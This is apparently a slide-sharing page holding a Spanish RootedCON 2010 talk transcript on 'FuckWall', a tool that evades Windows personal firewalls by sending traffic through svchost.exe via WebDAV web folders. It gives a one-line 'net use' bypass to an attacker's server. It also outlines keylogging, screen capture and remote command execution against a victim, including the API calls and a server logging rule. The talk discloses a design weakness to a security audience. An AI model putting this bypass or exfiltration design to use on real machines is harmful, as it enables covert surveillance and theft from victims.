Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Último

Manual Web soporte y mantenimiento de equipo de computo
Manual Web soporte y mantenimiento de equipo de computoManual Web soporte y mantenimiento de equipo de computo
Manual Web soporte y mantenimiento de equipo de computo
mantenimientocarbra6
 
Projecte Iniciativa TIC 2024 HPE. inCV.pdf
Projecte Iniciativa TIC 2024 HPE. inCV.pdfProjecte Iniciativa TIC 2024 HPE. inCV.pdf
Projecte Iniciativa TIC 2024 HPE. inCV.pdf
Festibity
 
Manual de soporte y mantenimiento de equipo de cómputo
Manual de soporte y mantenimiento de equipo de cómputoManual de soporte y mantenimiento de equipo de cómputo
Manual de soporte y mantenimiento de equipo de cómputo
doctorsoluciones34
 
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdfPLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
70244530
 
EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD
EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDADEXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD
EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD
AngelCristhianMB
 
computacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADOcomputacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADO
YaniEscobar2
 
Nuevos tiempos, nuevos espacios.docxdsdsad
Nuevos tiempos, nuevos espacios.docxdsdsadNuevos tiempos, nuevos espacios.docxdsdsad
Nuevos tiempos, nuevos espacios.docxdsdsad
larapalaciosmonzon28
 
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdfPresentación Seguridad Digital Profesional Azul Oscuro (1).pdf
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf
giampierdiaz5
 
edublogs info.docx asdasfasfsawqrdqwfqwfqwfq
edublogs info.docx asdasfasfsawqrdqwfqwfqwfqedublogs info.docx asdasfasfsawqrdqwfqwfqwfq
edublogs info.docx asdasfasfsawqrdqwfqwfqwfq
larapalaciosmonzon28
 
625204013-64-Camino-a-----La-Lectura.pdf
625204013-64-Camino-a-----La-Lectura.pdf625204013-64-Camino-a-----La-Lectura.pdf
625204013-64-Camino-a-----La-Lectura.pdf
yuberpalma
 
Presentación de Tic en educación y sobre blogger
Presentación de Tic en educación y sobre bloggerPresentación de Tic en educación y sobre blogger
Presentación de Tic en educación y sobre blogger
larapalaciosmonzon28
 
Flows: Mejores Prácticas y Nuevos Features
Flows: Mejores Prácticas y Nuevos FeaturesFlows: Mejores Prácticas y Nuevos Features
Flows: Mejores Prácticas y Nuevos Features
Paola De la Torre
 
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANOREVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
gisellearanguren1
 
Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf
Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdfProjecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf
Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf
Festibity
 
Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)
Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)
Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)
AbrahamCastillo42
 
Informació Projecte Iniciativa TIC HPE.pdf
Informació Projecte Iniciativa TIC HPE.pdfInformació Projecte Iniciativa TIC HPE.pdf
Informació Projecte Iniciativa TIC HPE.pdf
Festibity
 
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
codesiret
 
TIC en educacion.rtf.docxlolololololololo
TIC en educacion.rtf.docxlolololololololoTIC en educacion.rtf.docxlolololololololo
TIC en educacion.rtf.docxlolololololololo
KukiiSanchez
 
Modo test refrigeradores y codigos de errores 2018 V2.pdf
Modo test refrigeradores y codigos de errores 2018 V2.pdfModo test refrigeradores y codigos de errores 2018 V2.pdf
Modo test refrigeradores y codigos de errores 2018 V2.pdf
ranierglez
 
Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf
Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdfProjecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf
Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf
Festibity
 

Último (20)

Manual Web soporte y mantenimiento de equipo de computo
Manual Web soporte y mantenimiento de equipo de computoManual Web soporte y mantenimiento de equipo de computo
Manual Web soporte y mantenimiento de equipo de computo
 
Projecte Iniciativa TIC 2024 HPE. inCV.pdf
Projecte Iniciativa TIC 2024 HPE. inCV.pdfProjecte Iniciativa TIC 2024 HPE. inCV.pdf
Projecte Iniciativa TIC 2024 HPE. inCV.pdf
 
Manual de soporte y mantenimiento de equipo de cómputo
Manual de soporte y mantenimiento de equipo de cómputoManual de soporte y mantenimiento de equipo de cómputo
Manual de soporte y mantenimiento de equipo de cómputo
 
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdfPLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
PLAN DE MANTENMIENTO preventivo de un equipo de computo.pdf
 
EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD
EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDADEXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD
EXAMEN DE TOPOGRAFIA RESUELTO-2017 CURSO DE UNIVERSIDAD
 
computacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADOcomputacion global 3.pdf pARA TERCER GRADO
computacion global 3.pdf pARA TERCER GRADO
 
Nuevos tiempos, nuevos espacios.docxdsdsad
Nuevos tiempos, nuevos espacios.docxdsdsadNuevos tiempos, nuevos espacios.docxdsdsad
Nuevos tiempos, nuevos espacios.docxdsdsad
 
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdfPresentación Seguridad Digital Profesional Azul Oscuro (1).pdf
Presentación Seguridad Digital Profesional Azul Oscuro (1).pdf
 
edublogs info.docx asdasfasfsawqrdqwfqwfqwfq
edublogs info.docx asdasfasfsawqrdqwfqwfqwfqedublogs info.docx asdasfasfsawqrdqwfqwfqwfq
edublogs info.docx asdasfasfsawqrdqwfqwfqwfq
 
625204013-64-Camino-a-----La-Lectura.pdf
625204013-64-Camino-a-----La-Lectura.pdf625204013-64-Camino-a-----La-Lectura.pdf
625204013-64-Camino-a-----La-Lectura.pdf
 
Presentación de Tic en educación y sobre blogger
Presentación de Tic en educación y sobre bloggerPresentación de Tic en educación y sobre blogger
Presentación de Tic en educación y sobre blogger
 
Flows: Mejores Prácticas y Nuevos Features
Flows: Mejores Prácticas y Nuevos FeaturesFlows: Mejores Prácticas y Nuevos Features
Flows: Mejores Prácticas y Nuevos Features
 
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANOREVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
REVISTA TECNOLOGICA PARA EL DESARROLLO HUMANO
 
Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf
Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdfProjecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf
Projecte Iniciativa TIC 2024 SOPRA STERIA. inCV.pdf
 
Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)
Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)
Todo sobre la tarjeta de video (Bienvenidos a mi blog personal)
 
Informació Projecte Iniciativa TIC HPE.pdf
Informació Projecte Iniciativa TIC HPE.pdfInformació Projecte Iniciativa TIC HPE.pdf
Informació Projecte Iniciativa TIC HPE.pdf
 
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
Infografia TCP/IP (Transmission Control Protocol/Internet Protocol)
 
TIC en educacion.rtf.docxlolololololololo
TIC en educacion.rtf.docxlolololololololoTIC en educacion.rtf.docxlolololololololo
TIC en educacion.rtf.docxlolololololololo
 
Modo test refrigeradores y codigos de errores 2018 V2.pdf
Modo test refrigeradores y codigos de errores 2018 V2.pdfModo test refrigeradores y codigos de errores 2018 V2.pdf
Modo test refrigeradores y codigos de errores 2018 V2.pdf
 
Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf
Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdfProjecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf
Projecte Iniciativa TIC 2024 KAWARU CONSULTING. inCV.pdf
 

Antonio López & Javier Medina - FuckWALL - Bypassing firewalls [RootedCON 2010]

  • 1. FuckWall A Windows Firewalls Bypassing Tool  Congreso de Seguridad ~ Rooted CON’2010
  • 2. ¿Quiénes no sómos? Investigadores buscando fallos en el protocolo DNS Congreso de Seguridad ~ Rooted CON’2010 2
  • 3. ¿Quiénes no sómos? Hackers que vieron la luz al final del tunel y encontraron vida más allá de las consultoras... Congreso de Seguridad ~ Rooted CON’2010 3
  • 4. ¿Quiénes no sómos? Cálico Electrónico Congreso de Seguridad ~ Rooted CON’2010 4
  • 5. ¿Quiénes podríamos ser? M&M’s HackStory: Kernelpanik o Kpk fue un grupo de hackers nacido aproximadamente en el año 2000, según se desprende de la fecha de copyright de su web, aún activa. Las últimas noticias de Kernelpanik son de 2007, año en que se supone dejó de existir. Congreso de Seguridad ~ Rooted CON’2010 5
  • 6. ¿De qué vamos a hablar? -  Orígenes -  La idea aka. “El concepto es el concepto” -  PoC aka. “¿Esto realmente funciona?” -  FuckWall aka. “La herramienta” -  Demostración FuckWall aka. “Pa’habernos matao” Congreso de Seguridad ~ Rooted CON’2010 6
  • 7. FuckWall: Los orígenes (I) •  Once upon a time ... –  Éramos jóvenes, cometíamos errores y programábamos por dinero ... –  Pero aprendimos de nuestros errores ... Win32/Bypass: Anulando la detección de ficheros ( 2007 ) – Centrado en el bypassing de antivirus – Rudimentario técnicamente pero “ocurrente” Congreso de Seguridad ~ Rooted CON’2010 7
  • 8. FuckWall: Los orígenes (II) •  El presente: – Agosto de 2009: ¿Por qué no hacer lo mismo con los firewalls? – FuckWall: A Windows firewalls bypassing tool – Centrado en la evasión de los firewalls  Enviar tráfico de SALIDA sin control por parte del FW personal. – Apoyado en una debilidad de diseño – Desarrollo de una herramienta automatizada Congreso de Seguridad ~ Rooted CON’2010 8
  • 9. FuckWall: Fundamento funcional •  Usabilidad vs. Seguridad •  Procesos “privilegiados” en firewalls –  Por razones de “usabilidad”/”funcionalidad” numerosas compañías firewalls deciden “arbitrariamente” permitir libremente la comunicación de tráfico de salida a determinados procesos. Congreso de Seguridad ~ Rooted CON’2010 9
  • 10. FuckWall: Fundamento funcional •  OutPost: Congreso de Seguridad ~ Rooted CON’2010 1 0
  • 11. FuckWall: Fundamento funcional •  Zone Alarm: Congreso de Seguridad ~ Rooted CON’2010 1 1
  • 12. FuckWall: Fundamento funcional Y así hasta 8 firewalls personales más ... Se libró ( si la memoria no nos falla ): Jetico Congreso de Seguridad ~ Rooted CON’2010 1 2
  • 13. FuckWall: La idea •  Una vieja idea: – ¿Qué sucedería si desde el espacio de usuario pudiesemos controlar uno de esos procesos “privilegiados” por los firewalls? •  Se ha realizado anteriormente: – Hooking a una aplicación “privilegiada” – Más usual: hooking del navegador www.securitybydefault.com/2009/09/troyanos-titiriteros.html Congreso de Seguridad ~ Rooted CON’2010 1 3
  • 14. FuckWall: Revisando la idea •  Los problemas del hooking: – Técnica “relativamente” difundida e invasiva. – Los antivirus y los firewalls detectan intentos de hooking sobre aplicaciones, alertando al usuario de contenido vírico y/o peligroso. •  La idea revisada: – ¿Y si fuese posible desde el espacio de usuario interactuar directamente con un proceso privilegiado sin usar hooking? Congreso de Seguridad ~ Rooted CON’2010 1 4
  • 15. FuckWall: Construyendo la idea (I) •  El proceso SVCHOST.EXE – ¿Qué es el proceso SVCHOST.EXE? A grosso modo es la “idea” de Microsoft para ejecutar cualquier servicio que esté contenido en un DLL Congreso de Seguridad ~ Rooted CON’2010 1 5
  • 16. FuckWall: Construyendo la idea (I) •  El proceso SVCHOST.EXE – ¿Para qué se usa SVCHOST.EXE? •  DNS •  uPNP •  Tráfico ICMP •  Web Folders •  Y un largo etc ... Congreso de Seguridad ~ Rooted CON’2010 1 6
  • 17. FuckWall: Construyendo la idea (II) •  La gran pregunta: ¿Es posible manipular svchost.exe desde espacio de usuario y sin necesidad de ningún tipo de privilegio especial generando tráfico de salida dirigido? Congreso de Seguridad ~ Rooted CON’2010 1 7
  • 18. FuckWall: Construyendo la idea (III) - A nosotros se nos ocurre: La tecnología de Microsoft Windows denominada “carpetas web” / “web folders” hace uso de svchost.exe para su comunicación » No requiere privilegios » Permite comunicación WebDAV Congreso de Seguridad ~ Rooted CON’2010 1 8
  • 19. FuckWALL: Proof of Concept •  ¿Qué hace falta para evadir el control de tráfico saliente en aproximadamente el 90% de los firewalls personales de windows? –  Un servidor Apache con el módulo de WebDAV habilitado para compartir un recurso. –  Escribir desde el equipo del que queramos bypassear su firewal: net use Z: http://servidordav/recurso Congreso de Seguridad ~ Rooted CON’2010 1 9
  • 20. FuckWALL: Proof of Concept (II) DEMOSTRACIÓN I PoC Congreso de Seguridad ~ Rooted CON’2010 2 0
  • 21. FuckWALL: La Herramienta (I) •  FuckWall es una herramienta cliente-servidor que se apoya en el concepto anteriormente mostrado de hacer uso de la comunicación WebDAV, implementada a través del proceso svchost.exe, para evadir las medidas de seguridad sobre el tráfico saliente impuestas por firewalls personales en entornos Microsoft Windows. Congreso de Seguridad ~ Rooted CON’2010 2 1
  • 22. FuckWALL: La Herramienta (II) •  Funcionalidades: •  Captura de Teclado: Comunicación unidireccional hacia el servidor de las teclas pulsadas en la máquina cliente (víctima) •  Control Remoto: – Captura de pantalla: Comunicación bidireccional para envío al servidor de la pantalla capturada ante cada click del ratón en el equipo cliente (victima) – Ejecución de comandos: Comunicación bidireccional para la ejecución de comandos en la máquina cliente (víctima) y envío de resultados al servidor. Congreso de Seguridad ~ Rooted CON’2010 2 2
  • 23. FuckWALL: Función Keylogger •  Cada pulsación de tecla genera en el cliente un intento por montar un recurso compartido equivalente a la tecla pulsada. •  El servidor rechaza _siempre_ este intento de montaje, registrando la pulsación y la aplicación en la que se ha ejecutado. Congreso de Seguridad ~ Rooted CON’2010 2 3
  • 24. FuckWALL: Función Keylogger •  Cliente: –  Paso 1: SetWindowHookEx  Tecla pulsada. –  Paso 2: WNetAddConnection2  tecla.app.kpk •  Servidor (mod_rewrite): –  Paso 3: Rewriterule ^(.*).(.*).kpk$ logger.php?app= $1&key=$2  Registro –  Paso 4: header('HTTP/1.1 404 Not Found');  Error Congreso de Seguridad ~ Rooted CON’2010 2 4
  • 25. FuckWALL: Proof of Concept (II) DEMOSTRACIÓN II FuckWall Captura de Teclado Congreso de Seguridad ~ Rooted CON’2010 2 5
  • 26. FuckWALL: Función Control Remoto •  El cliente se conecta satisfactoriamente al recurso compartido por el servidor. •  El servidor para esta funcionalidad hace uso del módulo mod_dav. •  El cliente hará envíos de las capturas de pantalla ante cada click del usuario. •  El cliente se descarga del servidor la lista de comandos a ejecutar, los ejecuta y devuelve el resultado. Congreso de Seguridad ~ Rooted CON’2010 2 6
  • 27. FuckWALL: Función Control Remoto •  Paso 1: WNetAddConnection2  Recurso Netbios SIN Unidad* •  Paso 2: SetWindowHookEx  Captura de Pantalla •  Paso 3: CreateFile  Copiar datos al Servidor Congreso de Seguridad ~ Rooted CON’2010 2 7
  • 28. FuckWALL: Proof of Concept (II) DEMOSTRACIÓN III FuckWall Control Remoto Congreso de Seguridad ~ Rooted CON’2010 2 8
  • 29. FuckWALL: Conclusiones •  Fácil evasión del firewall •  Minimos requerimientos técnicos •  Llamadas básicas al API •  Debilidad basada en la confianza en determinados procesos vitales del sistema. Congreso de Seguridad ~ Rooted CON’2010 2 9
  • 30. ¡GRACIAS POR AGUANTAR EN LA SILLA! Autores ( en escricto orden de nacimiento ): Antonio López – alopmun@gmail.com Javier Medina – medina.fjavier@gmail.com Congreso de Seguridad ~ Rooted CON’2010